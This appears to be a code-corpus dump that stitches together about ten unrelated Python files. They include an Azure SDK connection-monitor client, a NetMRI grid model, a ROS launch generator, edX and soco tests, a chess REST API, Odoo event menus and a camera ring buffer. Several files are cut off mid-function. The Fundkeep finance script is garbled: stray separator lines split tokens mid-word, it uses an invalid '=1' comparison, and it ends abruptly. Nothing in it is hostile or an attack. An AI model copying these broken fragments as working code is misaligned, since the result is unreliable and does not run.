ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ConnectionMonitorsOperations(object):
"""ConnectionMonitorsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
connection_monitor_name, # type: str
parameters, # type: "_models.ConnectionMonitor"
**kwargs # type: Any
):
# type: (...) -> "_models.ConnectionMonitorResult"
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionMonitorResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'connectionMonitorName': self._serialize.url("connection_monitor_name", connection_monitor_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ConnectionMonitor')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ConnectionMonitorResult', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ConnectionMonitorResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/connectionMonitors/{connectionMonitorName}'}  # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
connection_monitor_name, # type: str
parameters, # type: "_models.ConnectionMonitor"
**kwargs # type: Any
):
        # type: (...) -> LROPoller["_models.ConnectionMonitorResult"]
"""Create or update a connection monitor.
:param resource_group_name: The name of the resource group containing Network Watcher.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:param connection_monitor_name: The name of the connection monitor.
:type connection_monitor_name: str
:param parameters: Parameters that define the operation to create a connection monitor.
:type parameters: ~azure.mgmt.network.v2018_12_01.models.ConnectionMonitor
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ConnectionMonitorResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_12_01.models.ConnectionMonitorResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionMonitorResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
connection_monitor_name=connection_monitor_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('ConnectionMonitorResult', pipeline_response)
infobloxopen/infoblox-netmri | infoblox_netmri/api/remote/models/spm_devices_vendor_model_grid_remote.py | Python | apache-2.0 | 4,572 | 0.00175 |
from ..remote import RemoteModel
from infoblox_netmri.utils.utils import check_api_availability
class SpmDevicesVendorModelGridRemote(RemoteModel):
"""
    This table lists all SPM devices that existed within the user-specified period of time, sorted by Device Name in ascending order.
    | ``id:`` The internal NetMRI identifier of the grid entry.
| ``attribute type:`` number
| ``Network:`` The name of the Network View associated.
| ``attribute type:`` string
| ``DeviceID:`` The NetMRI internal identifier for the device.
| ``attribute type:`` number
| ``DeviceName:`` The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
| ``attribute type:`` string
    | ``DeviceIPDotted:`` The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
| ``attribute type:`` string
| ``DeviceIPNumeric:`` The numerical value of the device IP address.
| ``attribute type:`` number
| ``DeviceDNSName:`` The device name as reported by DNS.
| ``attribute type:`` string
| ``TotalPorts:`` Total number of ports.
| ``attribute type:`` number
| ``FreePorts:`` Number of free ports.
| ``attribute type:`` number
| ``FreePortsPercentage:`` Percentage of all ports that are free.
| ``attribute type:`` number
| ``AvailPorts:`` Number of available ports.
| ``attribute type:`` number
| ``AvailPortsPercentage:`` Percentage of all ports that are available.
| ``attribute type:`` number
| ``PoEPorts:`` Number of Power-over-Ethernet ports.
| ``attribute type:`` number
| ``DeviceSysLocation:`` The device sysLocation as reported by SNMP.
| ``attribute type:`` string
| ``DeviceVendor:`` The device vendor name.
| ``attribute type:`` string
| ``DeviceModel:`` The device model name.
| ``attribute type:`` string
| ``PhysicalSerialNum:`` The vendor-specific serial number string for the physical entity. The preferred value is the serial number string actually printed on the component itself (if present).
| ``attribute type:`` string
| ``DeviceSysDescr:`` The device sysDescr as reported by SNMP.
| ``attribute type:`` string
| ``DeviceType:`` The NetMRI-determined device type.
| ``attribute type:`` string
| ``FirstSeen:`` The timestamp of when NetMRI first discovered this device.
| ``attribute type:`` datetime
| ``LastSeen:`` The timestamp of when NetMRI last polled data from this device.
| ``attribute type:`` datetime
| ``LastChanged:`` The timestamp of the last change on this device.
| ``attribute type:`` string
| ``PollDuration:`` Number of seconds it took to poll the device.
| ``attribute type:`` number
| ``SwitchingInd:`` A flag indicating whether a switch port forwarding table was retrieved from this device.
| ``attribute type:`` bool
| ``DeviceAssurance:`` Internal use only
| ``attribute type:`` string
| ``VirtualNetworkID:`` The internal identifier for the network which the device is associated to.
| ``attribute type:`` number
| ``UsedAccessPorts:`` Used Access Ports
| ``attribute type:`` number
| ``UsedTrunkPorts:`` Used Trunk Ports
| ``attribute type:`` number
"""
properties = ("id",
"Network",
"DeviceID",
"DeviceName",
"DeviceIPDotted",
"DeviceIPNumeric",
"DeviceDNSName",
"TotalPorts",
"FreePorts",
"FreePortsPercentage",
"AvailPorts",
"AvailPortsPercentage",
"PoEPorts",
"DeviceSysLocation",
"DeviceVendor",
"DeviceModel",
"PhysicalSerialNum",
"DeviceSysDescr",
"DeviceType",
"FirstSeen",
"LastSeen",
"LastChanged",
"PollDuration",
"SwitchingInd",
"DeviceAssurance",
"VirtualNetworkID",
"UsedAccessPorts",
"UsedTrunkPorts",
)
@property
@check_api_availability
def meta(self):
"""
User custom fields
``attribute type:`` model
"""
return self.broker.meta(**{"id": self.id})
serein7/openag_brain | src/openag_brain/commands/update_launch.py | Python | gpl-3.0 | 5,299 | 0.001698 |
import os
import rospkg
import lxml.etree as ET
from openag_brain import params
from openag.models import SoftwareModule, SoftwareModuleType
from openag.db_names import SOFTWARE_MODULE, SOFTWARE_MODULE_TYPE
# maping from python types to roslaunch acceptable ones
PARAM_TYPE_MAPPING = {'float' : 'double'}
def create_node(parent, pkg, type, name, args=None):
"""
Creates an xml node for the launch file that represents a ROS node.
`parent` is the parent xml node. `pkg` is the ROS package of the node.
`type` is the name of the executable for the node. `name` is the name
of the ROS node.
"""
e = ET.SubElement(parent, 'node')
e.attrib['pkg'] = pkg
e.attrib['type'] = type
e.attrib['name'] = name
if args:
e.attrib['args'] = args
return e
def create_param(parent, name, value, type):
"""
Creates an xml node for the launch file that represents a ROS parameter.
`parent` is the parent xml node. `name` is the name of the parameter to
set. `value` is the value of the parameter. `type` is the type of the
paremeter (e.g. int, float)
"""
e = ET.SubElement(parent, 'param')
e.attrib['name'] = name
e.attrib['value'] = value
e.attrib['type'] = PARAM_TYPE_MAPPING.get(type, type)
return e
def create_group(parent, ns):
"""
Creates an xml node for the launch file that represents a ROS group.
`parent` is the parent xml node. `ns` is the namespace of the group.
"""
e = ET.SubElement(parent, 'group')
e.attrib['ns'] = ns
return e
def create_remap(parent, from_val, to_val):
"""
    Creates an xml node for the launch file that represents a name remapping.
`parent` is the parent xml node. `from_val` is the name that is to be
remapped. `to_val` is the target name.
"""
e = ET.SubElement(parent, 'remap')
e.attrib['from'] = from_val
e.attrib['to'] = to_val
def create_arg(parent, name, default=None, value=None):
"""
Creates an xml node for the launch file that represents a command line
argument. `parent` is the parent xml node. `default` is the default value
of the argument. `value` is the value of the argument. At most one of
`default` and `value` can be provided.
"""
e = ET.SubElement(parent, 'arg')
e.attrib['name'] = name
if default and value:
raise ValueError(
"Argument cannot have both a default value and a value"
)
if default is not None:
e.attrib['default'] = str(default)
if value is not None:
e.attrib['value'] = str(value)
def update_launch(server):
"""
Write a roslaunch file to `modules.launch` based on the software module
configuration read from the `couchdb.Server` instance `server`.
"""
# Form a launch file from the parameter configuration
root = ET.Element('launch')
groups = {None: root}
module_db = server[SOFTWARE_MODULE]
module_types_db = server[SOFTWARE_MODULE_TYPE]
modules = {
module_id: SoftwareModule(module_db[module_id]) for module_id in
module_db if not module_id.startswith('_')
}
for module_id, module in modules.items():
print 'Processing module "{}" from server'.format(module_id)
mod_ns = module.get("namespace", module.get("environment", None))
if not mod_ns in groups:
group = create_group(root, mod_ns)
groups[mod_ns] = group
else:
group = groups[mod_ns]
if module["type"] in module_types_db:
module_type = SoftwareModuleType(module_types_db[module["type"]])
else:
raise RuntimeError(
                'Module "{}" references nonexistent module type "{}"'.format(
module_id, module["type"]
)
)
args = module.get("arguments", [])
args_str = ", ".join(args)
node = create_node(
group, module_type["package"], module_type["executable"],
module_id, args_str
)
for param_name, param_info in module_type["parameters"].items():
param_value = module.get("parameters", {}).get(
param_name, param_info.get("default", None)
)
param_type = param_info["type"]
if param_value is None:
if param_info.get("required", False):
raise RuntimeError(
'Parameter "{param}" is not defined for software '
'module "{mod_id}"'.format(
param=param_name, mod_id=module.id
)
)
else:
param_value = str(param_value) \
if not isinstance(param_value, bool) else \
str(param_value).lower()
param_type = str(param_type)
create_param(node, param_name, param_value, param_type)
for k,v in module.get("mappings", {}).items():
create_remap(node, k, v)
doc = ET.ElementTree(root)
# Figure out where to write the launch file
rospack = rospkg.RosPack()
pkg_path = rospack.get_path('openag_brain')
launch_path = os.path.join(pkg_path, 'modules.launch')
doc.write(launch_path, pretty_print=True)
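# --- Editor's sketch (not part of the original module) ---
# Exercises the helpers above to show the XML they emit; uses only lxml and
# the functions defined in this file. Names like 'am2315_1' are illustrative.
def _demo_launch_xml():
    root = ET.Element('launch')
    group = create_group(root, 'environment_1')
    node = create_node(group, 'openag_brain', 'sensor.py', 'am2315_1')
    create_param(node, 'rate', '2.5', 'float')  # PARAM_TYPE_MAPPING renders this as type="double"
    create_remap(node, 'raw', 'filtered')
    return ET.tostring(root, pretty_print=True)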
oyvindmal/SocoWebService | unittest/test_alarms.py | Python | mit | 538 | 0.003717 |
# -*- coding: utf-8 -*-
""" Tests for the alarms module """
from __future__ import unicode_literals
from soco.alarms import is_valid_recurrence
def test_recurrence():
for recur in ('DAILY', 'WEEKDAYS', 'WEEKENDS', 'ONCE'):
assert is_valid_recurrence(recur)
assert is_valid_recurrence('ON_1')
    assert is_valid_recurrence('ON_123412')
assert not is_valid_recurrence('on_1')
assert not is_valid_recurrence('ON_123456789')
assert not is_valid_recurrence('ON_')
assert not is_valid_recurrence(' ON_1')
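def test_recurrence_case_sensitivity():
    # Editor's sketch mirroring the checks above: since 'on_1' is rejected,
    # recurrence keywords appear to be case-sensitive and upper-case only.
    assert not is_valid_recurrence('daily')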
imakin/PersonalAssistant | Fundkeep/modul/b__main_backu.py | Python | mit | 2,347 | 0.041329 |
#!/usr/bin/env python
import os,sys
folder = "/media/kentir1/Development/Linux_Program/Fundkeep/"
def makinGetYear():
return os.popen("date +'%Y'").read()[:-1]
def makinGetMonth():
return os.popen("date +'%m'").read()[:-1]
def makinGetDay():
return os.popen("date +'%d'").read()[:-1]
def makinGetPrevYear(daypassed):
return os.popen("date --date='"+str(daypassed)+" day ago' +'%Y'").read()[:-1]
def makinGetPrevMonth(daypassed):
return os.popen("date --date='"+str(daypassed)+" day ago' +'%m'").read()[:-1]
def makinGetPrevDay(daypassed):
return os.popen("date --date='"+str(daypassed)+" day ago' +'%d'").read()[:-1]
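# Editor's sketch (not in the original script): the same date arithmetic can
# be done without shelling out to `date`, using only the standard library.
def makinGetPrevDate(daypassed):
    from datetime import datetime, timedelta
    prev = datetime.now() - timedelta(days=int(daypassed))
    return prev.strftime('%Y'), prev.strftime('%m'), prev.strftime('%d')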
#last entry
f = open(folder+"data/last_entry","r")
le = f.read()
le_y=le[:4]
le_m=le[4:6]
le_d=le[6:]
#input
os.system("gedit "+folder+"var/input")
f = open(folder+"var/input","r")
data = f.read()
f.close()
balance_out = int(data[:data.find(" ")])
balance_ket = data[data.find(" ")+1:-1]
print balance_ket
os.system("mkdir "+folder+"data")
os.system("mkdir "+folder+"data/"+makinGetYear())
os.system("mkdir "+folder+"data/"+makinGetYear()+"/"+makinGetMonth())
os.system("mkdir "+folder+"data/"+makinGetYear()+"/"+makinGetMonth()+"/"+makinGetDay())
balance_before = 0
# take the balance from the previous day
dapet = 0
while (dapet == 0):
dpassed = 1
try:
f = open(folder+"data/"
+makinGetPrevYear(dpassed)
+"/"
+makinGetPrevMonth(dpassed)
+"/"
+makinGetPrevDay(dpassed)
+"/balance_after","r")
if (makinGetDay()=="01"):
t_day = 31
t_bulan = ("0"+str(int(makinGetMonth())-1))[-2:]
|
t_tahun = makinGetYear()
if (i
|
nt(makinGetMonth())=1):
t_bulan = 12
t_tahun = makinGetYear()-1
print t_bulan
dapet = 0
while (dapet==0):
try:
f = open(folder+"data/"+t_tahun+"/"+t_bulan+"/"+("0"+str(t_day))[-2:]+"/balance_after","r")
print t_day
dapet = 1
balance_before = int(f.read())
except:
t_day = t_day - 1
f.close()
else:
t_day = int(makinGetDay())-1
#~ t_bulan = ("0"+str(int(makinGetMonth())))[-2:]
t_bulan = makinGetMonth()
f = open(folder+"data/"+makinGetYear()+"/"+t_bulan+"/"+("0"+str(t_day))[-2:]+"/balance_after","r")
balance_before = int(f.read())
# if this is a fresh entry
try:
f = open(folder+"data/"+t_tahun+"/"+t_bulan+"/"+("0"+str(t_day))[-2:]+"/balance_after","r")
except:
	# if only updating balance_out (today's spending)
stvstnfrd/edx-platform | common/lib/xmodule/xmodule/tests/test_library_content.py | Python | agpl-3.0 | 26,994 | 0.002741 |
# -*- coding: utf-8 -*-
"""
Basic unit tests for LibraryContentBlock
Higher-level tests are in `cms/djangoapps/contentstore/tests/test_libraries.py`.
"""
import six
from bson.objectid import ObjectId
from fs.memoryfs import MemoryFS
from lxml import etree
from mock import Mock, patch
from search.search_engine_base import SearchEngine
from six.moves import range
from web_fragments.fragment import Fragment
from xblock.runtime import Runtime as VanillaRuntime
from xmodule.library_content_module import ANY_CAPA_TYPE_VALUE, LibraryContentBlock
from xmodule.library_tools import LibraryToolsService
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.factories import CourseFactory, LibraryFactory
from xmodule.modulestore.tests.utils import MixedSplitTestCase
from xmodule.tests import get_test_system
from xmodule.validation import StudioValidationMessage
from xmodule.x_module import AUTHOR_VIEW
from .test_course_module import DummySystem as TestImportSystem
dummy_render = lambda block, _: Fragment(block.data) # pylint: disable=invalid-name
class LibraryContentTest(MixedSplitTestCase):
"""
Base class for tests of LibraryContentBlock (library_content_block.py)
"""
def setUp(self):
super(LibraryContentTest, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.tools = LibraryToolsService(self.store, self.user_id)
self.library = LibraryFactory.create(modulestore=self.store)
self.lib_blocks = [
self.make_block("html", self.library, data="Hello world from block {}".format(i))
for i in range(1, 5)
]
self.course = CourseFactory.create(modulestore=self.store)
self.chapter = self.make_block("chapter", self.course)
self.sequential = self.make_block("sequential", self.chapter)
self.vertical = self.make_block("vertical", self.sequential)
self.lc_block = self.make_block(
"library_content",
self.vertical,
max_count=1,
source_library_id=six.text_type(self.library.location.library_key)
)
def _bind_course_module(self, module):
"""
Bind a module (part of self.course) so we can access student-specific data.
"""
module_system = get_test_system(course_id=module.location.course_key)
module_system.descriptor_runtime = module.runtime._descriptor_system # pylint: disable=protected-access
module_system._services['library_tools'] = self.tools # pylint: disable=protected-access
def get_module(descriptor):
"""Mocks module_system get_module function"""
sub_module_system = get_test_system(course_id=module.location.course_key)
sub_module_system.get_module = get_module
sub_module_system.descriptor_runtime = descriptor._runtime # pylint: disable=protected-access
descriptor.bind_for_student(sub_module_system, self.user_id)
return descriptor
module_system.get_module = get_module
module.xmodule_runtime = module_system
class TestLibraryContentExportImport(LibraryContentTest):
"""
Export and import tests for LibraryContentBlock
"""
maxDiff = None
def test_xml_export_import_cycle(self):
"""
Test the export-import cycle.
"""
# Children will only set after calling this.
self.lc_block.refresh_children()
lc_block = self.store.get_item(self.lc_block.location)
expected_olx = (
'<library_content display_name="{block.display_name}" max_count="{block.max_count}"'
' source_library_id="{block.source_library_id}" source_library_version="{block.source_library_version}">\n'
' <html url_name="{block.children[0].block_id}"/>\n'
' <html url_name="{block.children[1].block_id}"/>\n'
' <html url_name="{block.children[2].block_id}"/>\n'
' <html url_name="{block.children[3].block_id}"/>\n'
'</library_content>\n'
).format(
block=lc_block,
)
export_fs = MemoryFS()
# Set the virtual FS to export the olx to.
lc_block.runtime._descriptor_system.export_fs = export_fs # pylint: disable=protected-access
        # Export the olx.
node = etree.Element("unknown_root")
lc_block.add_xml_to_node(node)
# Read it back
with export_fs.open('{dir}/{file_name}.xml'.format(
dir=lc_block.scope_ids.usage_id.block_type,
file_name=lc_block.scope_ids.usage_id.block_id
)) as f:
exported_olx = f.read()
# And compare.
assert exported_olx == expected_olx
        runtime = TestImportSystem(load_error_modules=True, course_id=lc_block.location.course_key)
runtime.resources_fs = export_fs
# Now import it.
olx_element = etree.fromstring(exported_olx)
id_generator = Mock()
imported_lc_block = LibraryContentBlock.parse_xml(olx_element, runtime, None, id_generator)
# Check the new XBlock has the same properties as the old one.
assert imported_lc_block.display_name == lc_block.display_name
assert imported_lc_block.source_library_id == lc_block.source_library_id
assert imported_lc_block.source_library_version == lc_block.source_library_version
assert imported_lc_block.mode == lc_block.mode
assert imported_lc_block.max_count == lc_block.max_count
assert imported_lc_block.capa_type == lc_block.capa_type
assert len(imported_lc_block.children) == 4
assert imported_lc_block.children == lc_block.children
class LibraryContentBlockTestMixin(object):
"""
Basic unit tests for LibraryContentBlock
"""
problem_types = [
["multiplechoiceresponse"], ["optionresponse"], ["optionresponse", "coderesponse"],
["coderesponse", "optionresponse"]
]
problem_type_lookup = {}
def _get_capa_problem_type_xml(self, *args):
""" Helper function to create empty CAPA problem definition """
problem = "<problem>"
for problem_type in args:
problem += "<{problem_type}></{problem_type}>".format(problem_type=problem_type)
problem += "</problem>"
return problem
def _create_capa_problems(self):
"""
Helper function to create a set of capa problems to test against.
Creates four blocks total.
"""
self.problem_type_lookup = {}
for problem_type in self.problem_types:
block = self.make_block("problem", self.library, data=self._get_capa_problem_type_xml(*problem_type))
self.problem_type_lookup[block.location] = problem_type
def test_lib_content_block(self):
"""
Test that blocks from a library are copied and added as children
"""
# Check that the LibraryContent block has no children initially
# Normally the children get added when the "source_libraries" setting
# is updated, but the way we do it through a factory doesn't do that.
assert len(self.lc_block.children) == 0
# Update the LibraryContent module:
self.lc_block.refresh_children()
self.lc_block = self.store.get_item(self.lc_block.location)
# Check that all blocks from the library are now children of the block:
assert len(self.lc_block.children) == len(self.lib_blocks)
def test_children_seen_by_a_user(self):
"""
Test that each student sees only one block as a child of the LibraryContent block.
"""
self.lc_block.refresh_children()
self.lc_block = self.store.get_item(self.lc_block.location)
self._bind_course_module(self.lc_block)
# Make sure the runtime knows that the block's children vary per-user:
assert self.lc_block.has_dynamic_children()
assert len(self.lc_block.children) == len(self.lib_blocks)
# Check how many children each user will see:
assert len(self.lc_block.get_child_descriptors()) == 1
# Check that get_content_titles() doesn't return titl
pacocampo/Backend | traveleando/project/usuario/admin.py | Python | gpl-3.0 | 213 | 0.018779 |
from django.contrib import admin
from . import models
# Register your models here.
#admin.site.register(models.MyUser)
@admin.register(models.MyUser)
class MyUserAdmin(admin.ModelAdmin):
list_display = ['user']
AHAPX/dark-chess | src/handlers/v2/game.py | Python | gpl-3.0 | 7,424 | 0.002963 |
from flask import request
from cache import (
add_to_queue, get_from_queue, get_from_any_queue, set_cache, get_cache,
delete_cache
)
import config
import consts
from connections import send_ws
from consts import WS_CHAT_MESSAGE
from decorators import validate
import errors
from game import Game
from handlers.v2.base import RestBase
from helpers import generate_token, get_prefix
from models import User, GamePool
from loggers import logger
from validators import GameNewValidator, GameMoveValidator
class RestGameBase(RestBase):
pre_methods = ['load_game']
def load_game(self, token):
try:
game = Game.load_game(token)
except errors.GameNotStartedError as e:
data = {
'type': consts.TYPES[e.type]['name'],
'limit': e.limit,
}
if (e.token):
data['invite'] = e.token
return data
except errors.GameNotFoundError as e:
raise errors.APIException(e.message)
if game._loaded_by == consts.WHITE:
if game.model.player_white is not None and game.model.player_white != request.user:
raise errors.APIException('wrong user')
else:
if game.model.player_black is not None and game.model.player_black != request.user:
raise errors.APIException('wrong user')
self.game = game
class RestTypes(RestBase):
def get(self):
types = [{
'name': t['name'],
'description': t['description'],
'periods': [{
'name': k,
'title': v[0],
} for k, v in sorted(t['periods'].items(), key=lambda a: a[1][1])],
} for t in consts.TYPES.values() if t['name'] != 'no limit']
return {'types': types}
class RestNewGame(RestBase):
def get(self):
result = []
count = 0
for pool in GamePool.select().where(
GamePool.is_started == False,
GamePool.is_lost == False,
            GamePool.player1.is_null(False),  # peewee null check; 'is not None' would always be truthy
).order_by(GamePool.date_created.desc()):
if pool.user1 and pool.user1 == request.user:
continue
result.append({
'id': pool.pk,
'date_created': pool.date_created.isoformat(),
'user': pool.user1.username if pool.user1 else None,
'type': consts.TYPES[pool.type_game]['name'],
'limit': pool.time_limit,
})
count += 1
if count > 9:
break
return {'games': result}
@validate(GameNewValidator)
def post(self):
game_type = self.data['type']
game_limit = self.data['limit']
token = generate_token(True)
pool = GamePool.create(
player1 = token,
user1 = request.user,
type_game = game_type,
time_limit = game_limit,
)
set_cache('wait_{}'.format(token), (game_type, game_limit))
return {'game': token}
class RestAcceptGame(RestBase):
def post(self, game_id):
try:
pool = GamePool.get(GamePool.pk == game_id)
except GamePool.DoesNotExist:
raise errors.APINotFound('game')
except Exception as e:
raise errors.APIException('wrong format')
if pool.user1 and pool.user1 == request.user:
raise errors.APIException('you cannot start game with yourself')
pool.player2 = generate_token(True)
pool.user2 = request.user
pool.is_started = True
pool.save()
game = Game.new_game(
pool.player1, pool.player2, pool.type_game, pool.time_limit,
white_user=pool.user1, black_user=pool.user2
)
delete_cache('wait_{}'.format(pool.player1))
result = {'game': pool.player2}
result.update(game.get_info(consts.BLACK))
return result
class RestNewInvite(RestBase):
@validate(GameNewValidator)
def post(self):
game_type = self.data['type']
game_limit = self.data['limit']
if game_type != consts.TYPE_NOLIMIT and not game_limit:
raise errors.APIException('game limit must be set for no limit game')
token_game = generate_token(True)
token_invite = generate_token(True)
set_cache('invite_{}'.format(token_invite), (token_game, game_type, game_limit))
if request.user:
set_cache('user_{}'.format(token_game), request.user.pk, 3600)
set_cache('wait_{}'.format(token_game), (game_type, game_limit, token_invite))
return {
'game': token_game,
'invite': token_invite,
}
class RestAcceptInvite(RestBase):
def get(self, token):
try:
enemy_token, game_type, game_limit = get_cache('invite_{}'.format(token))
except:
raise errors.APINotFound('game')
enemy_user = None
user_id = get_cache('user_{}'.format(enemy_token))
if user_id:
try:
enemy_user = User.get(pk=user_id)
except User.DoesNotExist:
# TODO: if user not found game will be created with None as white player
pass
user_token = generate_token(True)
        game = Game.new_game(
            enemy_token, user_token, game_type, game_limit,
white_user=enemy_user, black_user=request.user
)
delete_cache('wait_{}'.format(enemy_token))
result = {'game': user_token}
        result.update(game.get_info(consts.BLACK))
return result
class RestGames(RestBase):
def get(self):
from models import Game
result = {
'games': {
'actives': [],
'ended': [],
}
}
if request.user:
games = Game.select().where(
Game.date_end == None,
(Game.player_white == request.user) | (Game.player_black == request.user),
)
for game in games:
if game.player_white == request.user:
result['games']['actives'].append(game.white)
else:
result['games']['actives'].append(game.black)
games = Game.select().where(
Game.date_end != None,
(Game.player_white == request.user) | (Game.player_black == request.user),
).limit(10)
for game in games:
if game.player_white == request.user:
result['games']['ended'].append(game.white)
else:
result['games']['ended'].append(game.black)
return result
class RestInfo(RestGameBase):
def get(self, *args, **kwargs):
return self.game.get_info()
class RestMoves(RestGameBase):
def get(self, *args, **kwargs):
return self.game.moves()
@validate(GameMoveValidator)
def post(self, *args, **kwargs):
coor1 = self.data['coor1']
coor2 = self.data['coor2']
return self.game.move(coor1, coor2)
class RestDraw(RestGameBase):
# TODO: add get
def post(self, *args, **kwargs):
return self.game.draw_accept()
def delete(self, *args, **kwargs):
return self.game.draw_refuse()
class RestResign(RestGameBase):
def post(self, *args, **kwargs):
return self.game.resign()
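# Editor's note (sketch, inferred from the handlers above): the invite flow
# pairs RestNewInvite and RestAcceptInvite -- the first player receives
# {'game': token_game, 'invite': token_invite}, shares the invite token, and
# the second player GETs it back to obtain his own game token plus the
# initial board info from game.get_info(consts.BLACK).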
ygol/odoo | addons/website_event_track_online/models/event_event.py | Python | agpl-3.0 | 2,962 | 0.002701 |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, fields, api, _
from odoo.addons.http_routing.models.ir_http import slug
class EventEvent(models.Model):
_inherit = "event.event"
community_menu = fields.Boolean(
"Community Menu", compute="_compute_community_menu",
readonly=False, store=True,
help="Display community tab on website")
community_menu_ids = fields.One2many(
"website.event.menu", "event_id", string="Event Community Menus",
domain=[("menu_type", "=", "community")])
@api.depends("event_type_id", "website_menu", "community_menu")
def _compute_community_menu(self):
""" At type onchange: synchronize. At website_menu update: synchronize. """
for event in self:
if event.event_type_id and event.event_type_id != event._origin.event_type_id:
event.community_menu = event.event_type_id.community_menu
elif event.website_menu and event.website_menu != event._origin.website_menu or not event.community_menu:
event.community_menu = True
elif not event.website_menu:
event.community_menu = False
    # ------------------------------------------------------------
    # WEBSITE MENU MANAGEMENT
# ------------------------------------------------------------
# OVERRIDES: ADD SEQUENCE
def _get_menu_update_fields(self):
        update_fields = super(EventEvent, self)._get_menu_update_fields()
update_fields += ['community_menu']
return update_fields
def _update_website_menus(self, menus_update_by_field=None):
super(EventEvent, self)._update_website_menus(menus_update_by_field=menus_update_by_field)
for event in self:
if event.menu_id and (not menus_update_by_field or event in menus_update_by_field.get('community_menu')):
event._update_website_menu_entry('community_menu', 'community_menu_ids', '_get_community_menu_entries')
def _get_menu_type_field_matching(self):
res = super(EventEvent, self)._get_menu_type_field_matching()
res['community'] = 'community_menu'
return res
def _get_community_menu_entries(self):
self.ensure_one()
return [(_('Community'), '/event/%s/community' % slug(self), False, 80, 'community')]
def _get_track_menu_entries(self):
""" Remove agenda as this is now managed separately """
self.ensure_one()
return [
(_('Talks'), '/event/%s/track' % slug(self), False, 10, 'track'),
(_('Agenda'), '/event/%s/agenda' % slug(self), False, 70, 'track')
]
def _get_track_proposal_menu_entries(self):
""" See website_event_track._get_track_menu_entries() """
self.ensure_one()
return [(_('Talk Proposals'), '/event/%s/track_proposal' % slug(self), False, 15, 'track_proposal')]
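    # Editor's note (sketch, inferred from the entries above): each tuple is
    # (label, url, xml_id, sequence, menu_type); xml_id stays False for these
    # dynamically built menus, and sequence orders the tabs on the website.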
mivade/qCamera | qcamera/ring_buffer.py | Python | bsd-2-clause | 4,596 | 0.001958 |
"""Ring buffer for automatic storage of images"""
import os.path
import logging
from datetime import datetime
import numpy as np
from scipy.misc import imsave
import tables
class RingBuffer(object):
"""Ring buffer class.
Attributes
----------
directory : str
Location to store the ring buffer file.
recording : bool
True when data is being saved to the ring buffer.
N : int
Number of images to store in the ring buffer.
"""
def __init__(self, **kwargs):
"""Initialize the ring buffer.
Keyword arguments
-----------------
N : int
Number of images to store in the ring buffer.
directory : str
The directory to buffer images to.
filename : str
Filename to use for the HDF5 file.
recording : bool
Activate recording when True, disable when False.
logger : str
The name of the logger to use. Defaults to 'RingBuffer'.
roi : list
The currently selected region of interest.
"""
directory = kwargs.get('directory', '.')
filename = kwargs.get('filename', 'rbuffer.h5')
